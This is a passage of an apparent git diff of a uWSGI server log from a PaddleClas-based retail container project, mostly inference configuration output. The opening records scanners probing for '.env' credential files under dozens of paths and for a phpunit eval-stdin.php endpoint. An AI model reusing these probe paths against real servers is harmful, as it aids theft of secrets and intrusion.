14 00:34:32 2022] GET /.env => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1106/1280] 103.207.42.130 () {40 vars in 697 bytes} [Mon Feb 14 00:34:34 2022] POST / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1107/1281] 83.97.20.34 () {26 vars in 287 bytes} [Mon Feb 14 00:59:53 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.0 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1108/1282] 103.207.42.130 () {36 vars in 590 bytes} [Mon Feb 14 01:09:47 2022] GET /.env => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1109/1283] 103.207.42.130 () {40 vars in 697 bytes} [Mon Feb 14 01:09:48 2022] POST / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1110/1284] 223.70.167.234 () {36 vars in 521 bytes} [Mon Feb 14 03:01:44 2022] GET /.env => generated 179 bytes in 2 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1111/1285] 223.70.167.234 () {36 vars in 531 bytes} [Mon Feb 14 03:01:44 2022] GET /conf/.env => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1112/1286] 223.70.167.234 () {36 vars in 543 bytes} [Mon Feb 14 03:01:44 2022] GET /wp-content/.env => generated 179 bytes in 2 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19147|app: 0|req: 86/1287] 223.70.167.234 () {36 vars in 539 bytes} [Mon Feb 14 03:01:45 2022] GET /wp-admin/.env => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19147|app: 0|req: 87/1288] 223.70.167.234 () {36 vars in 537 bytes} [Mon Feb 14 03:01:45 2022] GET /library/.env => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 
switches on core 0) +[pid: 19146|app: 0|req: 40/1289] 223.70.167.234 () {36 vars in 529 bytes} [Mon Feb 14 03:01:46 2022] GET /new/.env => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19146|app: 0|req: 41/1290] 223.70.167.234 () {36 vars in 535 bytes} [Mon Feb 14 03:01:46 2022] GET /vendor/.env => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19146|app: 0|req: 42/1291] 223.70.167.234 () {36 vars in 529 bytes} [Mon Feb 14 03:01:46 2022] GET /old/.env => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1113/1292] 223.70.167.234 () {36 vars in 533 bytes} [Mon Feb 14 03:01:47 2022] GET /local/.env => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19145|app: 0|req: 15/1293] 223.70.167.234 () {36 vars in 529 bytes} [Mon Feb 14 03:01:47 2022] GET /api/.env => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19144|app: 0|req: 14/1294] 223.70.167.234 () {36 vars in 531 bytes} [Mon Feb 14 03:01:48 2022] GET /blog/.env => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19143|app: 0|req: 10/1295] 223.70.167.234 () {36 vars in 529 bytes} [Mon Feb 14 03:01:48 2022] GET /crm/.env => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19147|app: 0|req: 88/1296] 223.70.167.234 () {36 vars in 533 bytes} [Mon Feb 14 03:01:48 2022] GET /admin/.env => generated 0 bytes in 2 msecs (HTTP/1.1 302) 9 headers in 335 bytes (1 switches on core 0) +[pid: 19142|app: 0|req: 4/1297] 223.70.167.234 () {36 vars in 537 bytes} [Mon Feb 14 03:01:49 2022] GET /laravel/.env => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19142|app: 0|req: 5/1298] 223.70.167.234 () {36 vars in 529 
bytes} [Mon Feb 14 03:01:49 2022] GET /app/.env => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1114/1299] 223.70.167.234 () {36 vars in 543 bytes} [Mon Feb 14 03:01:49 2022] GET /app/config/.env => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19142|app: 0|req: 6/1300] 223.70.167.234 () {36 vars in 531 bytes} [Mon Feb 14 03:01:50 2022] GET /apps/.env => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1115/1301] 223.70.167.234 () {36 vars in 533 bytes} [Mon Feb 14 03:01:50 2022] GET /audio/.env => generated 179 bytes in 2 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19142|app: 0|req: 7/1302] 223.70.167.234 () {36 vars in 537 bytes} [Mon Feb 14 03:01:51 2022] GET /cgi-bin/.env => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19145|app: 0|req: 16/1303] 223.70.167.234 () {36 vars in 537 bytes} [Mon Feb 14 03:01:51 2022] GET /backend/.env => generated 179 bytes in 2 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19146|app: 0|req: 43/1304] 223.70.167.234 () {36 vars in 529 bytes} [Mon Feb 14 03:01:52 2022] GET /src/.env => generated 179 bytes in 2 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19144|app: 0|req: 15/1305] 223.70.167.234 () {36 vars in 531 bytes} [Mon Feb 14 03:01:53 2022] GET /base/.env => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19144|app: 0|req: 16/1306] 223.70.167.234 () {36 vars in 531 bytes} [Mon Feb 14 03:01:53 2022] GET /core/.env => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1116/1307] 223.70.167.234 () {36 vars in 551 bytes} [Mon Feb 14 03:01:54 2022] GET /vendor/laravel/.env => generated 179 
bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1117/1308] 223.70.167.234 () {36 vars in 537 bytes} [Mon Feb 14 03:01:54 2022] GET /storage/.env => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1118/1309] 223.70.167.234 () {36 vars in 541 bytes} [Mon Feb 14 03:01:55 2022] GET /protected/.env => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1119/1310] 223.70.167.234 () {36 vars in 537 bytes} [Mon Feb 14 03:01:55 2022] GET /newsite/.env => generated 179 bytes in 2 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1120/1311] 223.70.167.234 () {36 vars in 529 bytes} [Mon Feb 14 03:01:55 2022] GET /www/.env => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1121/1312] 223.70.167.234 () {36 vars in 581 bytes} [Mon Feb 14 03:01:56 2022] GET /sites/all/libraries/mailchimp/.env => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1122/1313] 223.70.167.234 () {36 vars in 539 bytes} [Mon Feb 14 03:01:56 2022] GET /database/.env => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1123/1314] 223.70.167.234 () {36 vars in 535 bytes} [Mon Feb 14 03:01:56 2022] GET /public/.env => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1124/1315] 223.70.167.234 () {36 vars in 549 bytes} [Mon Feb 14 03:01:57 2022] GET /47.100.88.229/.env => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1125/1316] 223.70.167.234 () {40 vars in 628 bytes} [Mon Feb 14 03:01:57 2022] POST / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 
5 headers in 158 bytes (1 switches on core 0) +[pid: 19144|app: 0|req: 17/1317] 223.70.167.234 () {38 vars in 640 bytes} [Mon Feb 14 03:01:58 2022] GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1126/1318] 2.58.149.136 () {40 vars in 566 bytes} [Mon Feb 14 03:14:42 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1127/1319] 20.55.53.144 () {34 vars in 495 bytes} [Mon Feb 14 03:50:15 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1128/1320] 83.97.20.34 () {30 vars in 329 bytes} [Mon Feb 14 04:30:15 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.0 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1129/1321] 103.203.56.1 () {34 vars in 388 bytes} [Mon Feb 14 05:07:26 2022] GET / => generated 179 bytes in 2 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1130/1322] 109.235.7.228 () {32 vars in 470 bytes} [Mon Feb 14 05:32:15 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1131/1323] 128.14.134.134 () {34 vars in 488 bytes} [Mon Feb 14 05:36:55 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1132/1324] 173.249.10.27 () {30 vars in 340 bytes} [Mon Feb 14 06:13:38 2022] HEAD / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1133/1325] 173.249.10.27 () {30 vars in 339 bytes} [Mon Feb 14 06:13:40 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1134/1326] 83.97.20.34 () {26 vars in 287 
bytes} [Mon Feb 14 06:59:09 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.0 404) 5 headers in 158 bytes (1 switches on core 0) req -2021-11-03 04:39:50 INFO: +2022-02-14 08:24:44 INFO: =========================================================== == PaddleClas is powered by PaddlePaddle ! == =========================================================== @@ -2555,78 +4744,61 @@ req == https://github.com/PaddlePaddle/PaddleClas == =========================================================== -2021-11-03 04:39:50 INFO: DetPostProcess : -2021-11-03 04:39:50 INFO: DetPreProcess : -2021-11-03 04:39:50 INFO: transform_ops : -2021-11-03 04:39:50 INFO: DetResize : -2021-11-03 04:39:50 INFO: interp : 2 -2021-11-03 04:39:50 INFO: keep_ratio : False -2021-11-03 04:39:50 INFO: target_size : [640, 640] -2021-11-03 04:39:50 INFO: DetNormalizeImage : -2021-11-03 04:39:50 INFO: is_scale : True -2021-11-03 04:39:50 INFO: mean : [0.485, 0.456, 0.406] -2021-11-03 04:39:50 INFO: std : [0.229, 0.224, 0.225] -2021-11-03 04:39:50 INFO: DetPermute : -2021-11-03 04:39:50 INFO: Global : -2021-11-03 04:39:50 INFO: batch_size : 1 -2021-11-03 04:39:50 INFO: cpu_num_threads : 10 -2021-11-03 04:39:50 INFO: det_inference_model_dir : /root/Smart_container/PaddleClas/deploy/models/picodet_PPLCNet_x2_5_mainbody_lite_v1.0_infer -2021-11-03 04:39:50 INFO: enable_benchmark : True -2021-11-03 04:39:50 INFO: enable_mkldnn : True -2021-11-03 04:39:50 INFO: enable_profile : False -2021-11-03 04:39:50 INFO: gpu_mem : 8000 -2021-11-03 04:39:50 INFO: image_shape : [3, 640, 640] -2021-11-03 04:39:50 INFO: infer_imgs : /root/Smart_container/PaddleClas/dataset/test_pic/test_client.jpg -2021-11-03 04:39:50 INFO: ir_optim : True -2021-11-03 04:39:50 INFO: labe_list : ['foreground'] -2021-11-03 04:39:50 INFO: max_det_results : 5 -2021-11-03 04:39:50 INFO: rec_inference_model_dir : /root/Smart_container/PaddleClas/deploy/models/general_PPLCNet_x2_5_lite_v1.0_infer -2021-11-03 04:39:50 INFO: rec_nms_thresold : 0.05 
-2021-11-03 04:39:50 INFO: threshold : 0.2 -2021-11-03 04:39:50 INFO: use_fp16 : False -2021-11-03 04:39:50 INFO: use_gpu : False -2021-11-03 04:39:50 INFO: use_tensorrt : False -2021-11-03 04:39:50 INFO: IndexProcess : -2021-11-03 04:39:50 INFO: index_dir : /root/Smart_container/PaddleClas/dataset/retail/index_update -2021-11-03 04:39:50 INFO: return_k : 5 -2021-11-03 04:39:50 INFO: score_thres : 0.5 -2021-11-03 04:39:50 INFO: RecPostProcess : None -2021-11-03 04:39:50 INFO: RecPreProcess : -2021-11-03 04:39:50 INFO: transform_ops : -2021-11-03 04:39:50 INFO: ResizeImage : -2021-11-03 04:39:50 INFO: size : 224 -2021-11-03 04:39:50 INFO: NormalizeImage : -2021-11-03 04:39:50 INFO: mean : [0.485, 0.456, 0.406] -2021-11-03 04:39:50 INFO: order : -2021-11-03 04:39:50 INFO: scale : 0.00392157 -2021-11-03 04:39:50 INFO: std : [0.229, 0.224, 0.225] -2021-11-03 04:39:50 INFO: ToCHWImage : None ---- Fused 0 subgraphs into layer_norm op. ---- fused 0 scale with matmul ---- Fused 0 ReshapeTransposeMatmulMkldnn patterns ---- Fused 0 ReshapeTransposeMatmulMkldnn patterns with transpose's xshape ---- Fused 0 ReshapeTransposeMatmulMkldnn patterns with reshape's xshape ---- Fused 0 ReshapeTransposeMatmulMkldnn patterns with reshape's xshape with transpose's xshape ---- Fused 0 MatmulTransposeReshape patterns ---- fused 0 batch norm with relu activation ---- Fused 0 subgraphs into layer_norm op. 
---- fused 0 scale with matmul ---- Fused 0 ReshapeTransposeMatmulMkldnn patterns ---- Fused 0 ReshapeTransposeMatmulMkldnn patterns with transpose's xshape ---- Fused 0 ReshapeTransposeMatmulMkldnn patterns with reshape's xshape ---- Fused 0 ReshapeTransposeMatmulMkldnn patterns with reshape's xshape with transpose's xshape ---- Fused 0 MatmulTransposeReshape patterns ---- fused 0 batch norm with relu activation -Inference: 2184.7615242004395 ms per batch image -[{'bbox': [0, 0, 640, 480], 'rec_docs': '江小白', 'rec_scores': 0.525891}] -{'bbox': [0, 0, 640, 480], 'rec_docs': '江小白', 'rec_scores': 0.525891} +2022-02-14 08:24:44 INFO: DetPostProcess : +2022-02-14 08:24:44 INFO: DetPreProcess : +2022-02-14 08:24:44 INFO: transform_ops : +2022-02-14 08:24:44 INFO: DetResize : +2022-02-14 08:24:44 INFO: interp : 2 +2022-02-14 08:24:44 INFO: keep_ratio : False +2022-02-14 08:24:44 INFO: target_size : [640, 640] +2022-02-14 08:24:44 INFO: DetNormalizeImage : +2022-02-14 08:24:44 INFO: is_scale : True +2022-02-14 08:24:44 INFO: mean : [0.485, 0.456, 0.406] +2022-02-14 08:24:44 INFO: std : [0.229, 0.224, 0.225] +2022-02-14 08:24:44 INFO: DetPermute : +2022-02-14 08:24:44 INFO: Global : +2022-02-14 08:24:44 INFO: batch_size : 1 +2022-02-14 08:24:44 INFO: cpu_num_threads : 1 +2022-02-14 08:24:44 INFO: det_inference_model_dir : /root/Smart_container/PaddleClas/deploy/models/picodet_PPLCNet_x2_5_mainbody_lite_v1.0_infer +2022-02-14 08:24:44 INFO: enable_benchmark : True +2022-02-14 08:24:44 INFO: enable_mkldnn : True +2022-02-14 08:24:44 INFO: enable_profile : False +2022-02-14 08:24:44 INFO: gpu_mem : 8000 +2022-02-14 08:24:44 INFO: image_shape : [3, 640, 640] +2022-02-14 08:24:44 INFO: infer_imgs : /root/Smart_container/PaddleClas/dataset/test_pic/test_client.jpg +2022-02-14 08:24:44 INFO: ir_optim : True +2022-02-14 08:24:44 INFO: labe_list : ['foreground'] +2022-02-14 08:24:44 INFO: max_det_results : 5 +2022-02-14 08:24:44 INFO: rec_inference_model_dir : 
/root/Smart_container/PaddleClas/deploy/models/general_PPLCNet_x2_5_lite_v1.0_infer +2022-02-14 08:24:44 INFO: rec_nms_thresold : 0.05 +2022-02-14 08:24:44 INFO: threshold : 0.2 +2022-02-14 08:24:44 INFO: use_fp16 : False +2022-02-14 08:24:44 INFO: use_gpu : False +2022-02-14 08:24:44 INFO: use_tensorrt : False +2022-02-14 08:24:44 INFO: IndexProcess : +2022-02-14 08:24:44 INFO: index_dir : /root/Smart_container/PaddleClas/dataset/retail/index_update +2022-02-14 08:24:44 INFO: return_k : 5 +2022-02-14 08:24:44 INFO: score_thres : 0.5 +2022-02-14 08:24:44 INFO: RecPostProcess : None +2022-02-14 08:24:44 INFO: RecPreProcess : +2022-02-14 08:24:44 INFO: transform_ops : +2022-02-14 08:24:44 INFO: ResizeImage : +2022-02-14 08:24:44 INFO: size : 224 +2022-02-14 08:24:44 INFO: NormalizeImage : +2022-02-14 08:24:44 INFO: mean : [0.485, 0.456, 0.406] +2022-02-14 08:24:44 INFO: order : +2022-02-14 08:24:44 INFO: scale : 0.00392157 +2022-02-14 08:24:44 INFO: std : [0.229, 0.224, 0.225] +2022-02-14 08:24:44 INFO: ToCHWImage : None +Inference: 373.57163429260254 ms per batch image +[] 234 -["{'bbox': [0, 0, 640, 480], 'rec_docs': '江小白', 'rec_scores': 0.525891}\n"] -['江小白'] -['江小白', '30'] -[pid: 32765|app: 0|req: 16/29] 210.51.42.176 () {34 vars in 432 bytes} [Wed Nov 3 04:39:48 2021] POST /reference_client/ => generated 114 bytes in 6046 msecs (HTTP/1.1 200) 5 headers in 158 bytes (11 switches on core 0) +["Please connect root to upload container's name and it's price!\n"] +[pid: 19148|app: 0|req: 1135/1327] 223.167.141.7 () {34 vars in 449 bytes} [Mon Feb 14 08:24:43 2022] POST /reference_client/ => generated 98 bytes in 2988 msecs (HTTP/1.1 200) 5 headers in 157 bytes (22 switches on core 0) +[pid: 19147|app: 0|req: 89/1328] 23.99.198.33 () {36 vars in 588 bytes} [Mon Feb 14 08:24:50 2022] GET /.env => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19145|app: 0|req: 17/1329] 23.99.198.33 () {40 vars in 695 bytes} [Mon Feb 14 
08:24:51 2022] POST / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) req -2021-11-03 04:40:11 INFO: +2022-02-14 08:25:01 INFO: =========================================================== == PaddleClas is powered by PaddlePaddle ! == =========================================================== @@ -2636,78 +4808,59 @@ req == https://github.com/PaddlePaddle/PaddleClas == =========================================================== -2021-11-03 04:40:11 INFO: DetPostProcess : -2021-11-03 04:40:11 INFO: DetPreProcess : -2021-11-03 04:40:11 INFO: transform_ops : -2021-11-03 04:40:11 INFO: DetResize : -2021-11-03 04:40:11 INFO: interp : 2 -2021-11-03 04:40:11 INFO: keep_ratio : False -2021-11-03 04:40:11 INFO: target_size : [640, 640] -2021-11-03 04:40:11 INFO: DetNormalizeImage : -2021-11-03 04:40:11 INFO: is_scale : True -2021-11-03 04:40:11 INFO: mean : [0.485, 0.456, 0.406] -2021-11-03 04:40:11 INFO: std : [0.229, 0.224, 0.225] -2021-11-03 04:40:11 INFO: DetPermute : -2021-11-03 04:40:11 INFO: Global : -2021-11-03 04:40:11 INFO: batch_size : 1 -2021-11-03 04:40:11 INFO: cpu_num_threads : 10 -2021-11-03 04:40:11 INFO: det_inference_model_dir : /root/Smart_container/PaddleClas/deploy/models/picodet_PPLCNet_x2_5_mainbody_lite_v1.0_infer -2021-11-03 04:40:11 INFO: enable_benchmark : True -2021-11-03 04:40:11 INFO: enable_mkldnn : True -2021-11-03 04:40:11 INFO: enable_profile : False -2021-11-03 04:40:11 INFO: gpu_mem : 8000 -2021-11-03 04:40:11 INFO: image_shape : [3, 640, 640] -2021-11-03 04:40:11 INFO: infer_imgs : /root/Smart_container/PaddleClas/dataset/test_pic/test_client.jpg -2021-11-03 04:40:11 INFO: ir_optim : True -2021-11-03 04:40:11 INFO: labe_list : ['foreground'] -2021-11-03 04:40:11 INFO: max_det_results : 5 -2021-11-03 04:40:11 INFO: rec_inference_model_dir : /root/Smart_container/PaddleClas/deploy/models/general_PPLCNet_x2_5_lite_v1.0_infer -2021-11-03 04:40:11 INFO: rec_nms_thresold : 0.05 -2021-11-03 
04:40:11 INFO: threshold : 0.2 -2021-11-03 04:40:11 INFO: use_fp16 : False -2021-11-03 04:40:11 INFO: use_gpu : False -2021-11-03 04:40:11 INFO: use_tensorrt : False -2021-11-03 04:40:11 INFO: IndexProcess : -2021-11-03 04:40:11 INFO: index_dir : /root/Smart_container/PaddleClas/dataset/retail/index_update -2021-11-03 04:40:11 INFO: return_k : 5 -2021-11-03 04:40:11 INFO: score_thres : 0.5 -2021-11-03 04:40:11 INFO: RecPostProcess : None -2021-11-03 04:40:11 INFO: RecPreProcess : -2021-11-03 04:40:11 INFO: transform_ops : -2021-11-03 04:40:11 INFO: ResizeImage : -2021-11-03 04:40:11 INFO: size : 224 -2021-11-03 04:40:11 INFO: NormalizeImage : -2021-11-03 04:40:11 INFO: mean : [0.485, 0.456, 0.406] -2021-11-03 04:40:11 INFO: order : -2021-11-03 04:40:11 INFO: scale : 0.00392157 -2021-11-03 04:40:11 INFO: std : [0.229, 0.224, 0.225] -2021-11-03 04:40:11 INFO: ToCHWImage : None ---- Fused 0 subgraphs into layer_norm op. ---- fused 0 scale with matmul ---- Fused 0 ReshapeTransposeMatmulMkldnn patterns ---- Fused 0 ReshapeTransposeMatmulMkldnn patterns with transpose's xshape ---- Fused 0 ReshapeTransposeMatmulMkldnn patterns with reshape's xshape ---- Fused 0 ReshapeTransposeMatmulMkldnn patterns with reshape's xshape with transpose's xshape ---- Fused 0 MatmulTransposeReshape patterns ---- fused 0 batch norm with relu activation ---- Fused 0 subgraphs into layer_norm op. 
---- fused 0 scale with matmul ---- Fused 0 ReshapeTransposeMatmulMkldnn patterns ---- Fused 0 ReshapeTransposeMatmulMkldnn patterns with transpose's xshape ---- Fused 0 ReshapeTransposeMatmulMkldnn patterns with reshape's xshape ---- Fused 0 ReshapeTransposeMatmulMkldnn patterns with reshape's xshape with transpose's xshape ---- Fused 0 MatmulTransposeReshape patterns ---- fused 0 batch norm with relu activation -Inference: 2640.110492706299 ms per batch image -[{'bbox': [11, 57, 505, 479], 'rec_docs': '江小白', 'rec_scores': 0.6217595}] -{'bbox': [11, 57, 505, 479], 'rec_docs': '江小白', 'rec_scores': 0.6217595} +2022-02-14 08:25:01 INFO: DetPostProcess : +2022-02-14 08:25:01 INFO: DetPreProcess : +2022-02-14 08:25:01 INFO: transform_ops : +2022-02-14 08:25:01 INFO: DetResize : +2022-02-14 08:25:01 INFO: interp : 2 +2022-02-14 08:25:01 INFO: keep_ratio : False +2022-02-14 08:25:01 INFO: target_size : [640, 640] +2022-02-14 08:25:01 INFO: DetNormalizeImage : +2022-02-14 08:25:01 INFO: is_scale : True +2022-02-14 08:25:01 INFO: mean : [0.485, 0.456, 0.406] +2022-02-14 08:25:01 INFO: std : [0.229, 0.224, 0.225] +2022-02-14 08:25:01 INFO: DetPermute : +2022-02-14 08:25:01 INFO: Global : +2022-02-14 08:25:01 INFO: batch_size : 1 +2022-02-14 08:25:01 INFO: cpu_num_threads : 1 +2022-02-14 08:25:01 INFO: det_inference_model_dir : /root/Smart_container/PaddleClas/deploy/models/picodet_PPLCNet_x2_5_mainbody_lite_v1.0_infer +2022-02-14 08:25:01 INFO: enable_benchmark : True +2022-02-14 08:25:01 INFO: enable_mkldnn : True +2022-02-14 08:25:01 INFO: enable_profile : False +2022-02-14 08:25:01 INFO: gpu_mem : 8000 +2022-02-14 08:25:01 INFO: image_shape : [3, 640, 640] +2022-02-14 08:25:01 INFO: infer_imgs : /root/Smart_container/PaddleClas/dataset/test_pic/test_client.jpg +2022-02-14 08:25:01 INFO: ir_optim : True +2022-02-14 08:25:01 INFO: labe_list : ['foreground'] +2022-02-14 08:25:01 INFO: max_det_results : 5 +2022-02-14 08:25:01 INFO: rec_inference_model_dir : 
/root/Smart_container/PaddleClas/deploy/models/general_PPLCNet_x2_5_lite_v1.0_infer +2022-02-14 08:25:01 INFO: rec_nms_thresold : 0.05 +2022-02-14 08:25:01 INFO: threshold : 0.2 +2022-02-14 08:25:01 INFO: use_fp16 : False +2022-02-14 08:25:01 INFO: use_gpu : False +2022-02-14 08:25:01 INFO: use_tensorrt : False +2022-02-14 08:25:01 INFO: IndexProcess : +2022-02-14 08:25:01 INFO: index_dir : /root/Smart_container/PaddleClas/dataset/retail/index_update +2022-02-14 08:25:01 INFO: return_k : 5 +2022-02-14 08:25:01 INFO: score_thres : 0.5 +2022-02-14 08:25:01 INFO: RecPostProcess : None +2022-02-14 08:25:01 INFO: RecPreProcess : +2022-02-14 08:25:01 INFO: transform_ops : +2022-02-14 08:25:01 INFO: ResizeImage : +2022-02-14 08:25:01 INFO: size : 224 +2022-02-14 08:25:01 INFO: NormalizeImage : +2022-02-14 08:25:01 INFO: mean : [0.485, 0.456, 0.406] +2022-02-14 08:25:01 INFO: order : +2022-02-14 08:25:01 INFO: scale : 0.00392157 +2022-02-14 08:25:01 INFO: std : [0.229, 0.224, 0.225] +2022-02-14 08:25:01 INFO: ToCHWImage : None +Inference: 374.43017959594727 ms per batch image +[] 234 -["{'bbox': [11, 57, 505, 479], 'rec_docs': '江小白', 'rec_scores': 0.6217595}\n"] -['江小白'] -['江小白', '30'] -[pid: 32766|app: 0|req: 12/30] 210.51.42.176 () {34 vars in 432 bytes} [Wed Nov 3 04:40:09 2021] POST /reference_client/ => generated 114 bytes in 6615 msecs (HTTP/1.1 200) 5 headers in 158 bytes (11 switches on core 0) +["Please connect root to upload container's name and it's price!\n"] +[pid: 19148|app: 0|req: 1136/1330] 223.167.141.7 () {34 vars in 448 bytes} [Mon Feb 14 08:25:00 2022] POST /reference_client/ => generated 98 bytes in 2930 msecs (HTTP/1.1 200) 5 headers in 157 bytes (22 switches on core 0) req -2021-11-03 04:42:51 INFO: +2022-02-14 08:52:13 INFO: =========================================================== == PaddleClas is powered by PaddlePaddle ! 
== =========================================================== @@ -2717,81 +4870,59 @@ req == https://github.com/PaddlePaddle/PaddleClas == =========================================================== -2021-11-03 04:42:51 INFO: DetPostProcess : -2021-11-03 04:42:51 INFO: DetPreProcess : -2021-11-03 04:42:51 INFO: transform_ops : -2021-11-03 04:42:51 INFO: DetResize : -2021-11-03 04:42:51 INFO: interp : 2 -2021-11-03 04:42:51 INFO: keep_ratio : False -2021-11-03 04:42:51 INFO: target_size : [640, 640] -2021-11-03 04:42:51 INFO: DetNormalizeImage : -2021-11-03 04:42:51 INFO: is_scale : True -2021-11-03 04:42:51 INFO: mean : [0.485, 0.456, 0.406] -2021-11-03 04:42:51 INFO: std : [0.229, 0.224, 0.225] -2021-11-03 04:42:51 INFO: DetPermute : -2021-11-03 04:42:51 INFO: Global : -2021-11-03 04:42:51 INFO: batch_size : 1 -2021-11-03 04:42:51 INFO: cpu_num_threads : 10 -2021-11-03 04:42:51 INFO: det_inference_model_dir : /root/Smart_container/PaddleClas/deploy/models/picodet_PPLCNet_x2_5_mainbody_lite_v1.0_infer -2021-11-03 04:42:51 INFO: enable_benchmark : True -2021-11-03 04:42:51 INFO: enable_mkldnn : True -2021-11-03 04:42:51 INFO: enable_profile : False -2021-11-03 04:42:51 INFO: gpu_mem : 8000 -2021-11-03 04:42:51 INFO: image_shape : [3, 640, 640] -2021-11-03 04:42:51 INFO: infer_imgs : /root/Smart_container/PaddleClas/dataset/test_pic/test_client.jpg -2021-11-03 04:42:51 INFO: ir_optim : True -2021-11-03 04:42:51 INFO: labe_list : ['foreground'] -2021-11-03 04:42:51 INFO: max_det_results : 5 -2021-11-03 04:42:51 INFO: rec_inference_model_dir : /root/Smart_container/PaddleClas/deploy/models/general_PPLCNet_x2_5_lite_v1.0_infer -2021-11-03 04:42:51 INFO: rec_nms_thresold : 0.05 -2021-11-03 04:42:51 INFO: threshold : 0.2 -2021-11-03 04:42:51 INFO: use_fp16 : False -2021-11-03 04:42:51 INFO: use_gpu : False -2021-11-03 04:42:51 INFO: use_tensorrt : False -2021-11-03 04:42:51 INFO: IndexProcess : -2021-11-03 04:42:51 INFO: index_dir : 
